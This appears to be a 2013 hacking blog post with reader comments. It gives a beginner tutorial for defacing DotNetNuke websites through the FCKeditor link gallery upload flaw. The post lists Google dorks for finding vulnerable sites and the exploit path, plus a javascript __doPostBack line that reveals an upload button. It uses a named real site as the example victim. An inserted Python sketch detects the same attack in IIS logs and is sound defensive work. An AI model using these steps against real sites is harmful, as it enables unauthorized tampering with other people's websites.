LinuxSec Exploit

Nothing is Ever Locked

Defacement Tutorial with DNN | Newbie Only

March 12, 2013 by Jack Wilder 22 Comments

This time I will share a defacement technique using Dot Net Nuke, commonly called DNN. The technique is very easy, which makes it suitable learning material for beginners. Those who are already masters had better close their eyes for now. :v
Okay, let's get straight to it.

Google Dork:

  • inurl:"/portals/0"
  • inurl:fcklinkgallery.aspx

Feel free to develop other dorks yourself.

    Exploit: Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
    First, search for a target on Google with the dork above. You have to be patient while searching. The address we found turned out to be http://www.caslpo.com/Portals/0/kotek.xml
    Second, insert the exploit path in place of everything from portals/0/ onward, so that it becomes http://www.caslpo.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
    It will then look like this:

    Then select File. Clear the URL in the address bar and replace it with the following script: javascript:__doPostBack('ctlURL$cmdUpload','')

    An upload button will then appear. Click that button. Choose the file to upload. As an example, I uploaded a file named jkt.txt. Then choose Upload Selected File.

    Wait for the upload to finish. Your deface result is located at http://situs/portals/0/namafile (situs is the site, namafile is the file name).

    So my deface result is located at:
    http://www.caslpo.com/portals/0/jkt.txt

    How about that? Easy, right? If anything is unclear, feel free to ask in the comment box.

    • NB: The file extensions that can be uploaded are: swf, jpg, jpeg, JPE, gif, bmp, png, doc, xls, ppt, pdf, txt, xml, xsl, css, zip, 3gp, asf, asx, avi, flv, m4v, mov, mp4, mpe, mpeg, mpg, ram, rm, rmvb, wm, wmv, vob. You cannot upload a PHP shell!
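
Seen from the server side, the steps above leave a recognizable sequence in the IIS access log: a request for the link gallery page, a POST to it, then a GET for a file directly under `/Portals/<id>/`. The following detection sketch is an added example, not part of the original post; the W3C field order, the finding labels and every log line are constructed assumptions.

```python
import re

# Constructed IIS W3C log (documentation IPs; not from any real server).
# Assumption: the site logs these fields in this order.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-03-12 10:01:02 198.51.100.7 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 200
2013-03-12 10:01:40 198.51.100.7 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 200
2013-03-12 10:02:05 198.51.100.7 GET /Portals/0/jkt.txt - 200
2013-03-12 10:03:00 203.0.113.9 GET /Portals/0/logo.png - 200
2013-03-12 10:05:00 192.0.2.15 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 404
"""

GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
PORTAL_FILE = re.compile(r"^/portals/\d+/[^/]+$")  # file directly under a portal root


def scan(log_text):
    """Return (kind, client_ip, uri_stem, status) tuples worth reviewing."""
    fields, posted, findings = [], set(), []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the records that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # skip malformed records
        rec = dict(zip(fields, parts))
        ip, method = rec["c-ip"], rec["cs-method"]
        stem, status = rec["cs-uri-stem"], rec["sc-status"]
        if stem.lower().endswith(GALLERY):
            # Any direct hit on the link gallery page is worth a look.
            kind = "gallery-post" if method == "POST" else "gallery-view"
            if kind == "gallery-post" and status.startswith("2"):
                posted.add(ip)
            findings.append((kind, ip, stem, status))
        elif (ip in posted and method == "GET" and status.startswith("2")
              and PORTAL_FILE.match(stem.lower())):
            # Same client fetches a portal file after posting to the gallery.
            findings.append(("portal-file-after-post", ip, stem, status))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A `portal-file-after-post` finding is the one to triage first, since it pairs a successful POST to the gallery with a retrieval from the portal folder by the same client.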
    Filed Under: Uncategorized Tagged With: Hacking

    Comments

    1. BlogS of Hariyanto says

      March 12, 2013 at 10:00 pm

      Since I'm not a master... that means I don't have to close my eyes, right? 🙂

      • chiaki says

        March 13, 2013 at 12:09 am

        :v

      • ilham haka says

        May 20, 2013 at 10:08 am

        Bro, where do you look for DNN?

        A beginner

    2. febriansyah haq says

      March 13, 2013 at 12:43 am

      Not bad for the collection 🙂

      • chiaki says

        March 13, 2013 at 12:49 am

        Hehehe

    3. Masnady says

      March 13, 2013 at 1:35 am

      Hehehehe, I've read it twice, bro, but I still don't get it. Maybe I'd understand faster if I practiced along, bro. But I'm on my phone, so I can't practice at the same time. Hehehehe

      • chiaki says

        March 13, 2013 at 6:09 am

        With practice it's quick. :v

    4. Rohis Facebook says

      March 13, 2013 at 2:25 am

      Now I'm afraid someone will mess with my blog... this knowledge could end up being misused *smile

      • chiaki says

        March 13, 2013 at 6:10 am

        It doesn't work on Blogspot. -_-

    5. budi os 19 says

      March 13, 2013 at 3:10 am

      When it comes to this kind of thing, Mas Yuyud is the best 🙂

    6. budi os 19 says

      March 13, 2013 at 3:10 am

      When it comes to this kind of thing, Mas Yuyud is the best 🙂

      • chiaki says

        March 13, 2013 at 6:10 am

        I'm just a beginner, bro. :v

    7. Djangkaru Bumi says

      March 13, 2013 at 4:51 am

      Just shaking my head with my eyes closed 😀

      • chiaki says

        March 13, 2013 at 6:11 am

        Hahaha. :v

    8. Riyono says

      March 13, 2013 at 4:52 am

      What is its main function, bro? 🙂

    9. Abed Saragih says

      March 13, 2013 at 4:53 am

      Oh, so this is for defacing, changing the front page of a website, right, friend?

      • chiaki says

        March 13, 2013 at 6:21 am

        It doesn't have to be the front page.

    10. cik awi says

      March 13, 2013 at 5:37 am

      I'll close my eyes for now, bro... Wkwkwk!

      • chiaki says

        March 13, 2013 at 6:08 am

        A master, then. (y)

    11. cak oni says

      March 13, 2013 at 12:21 pm

      Nice, bro, for newbies

      • chiaki says

        March 13, 2013 at 12:45 pm

        Yes. :v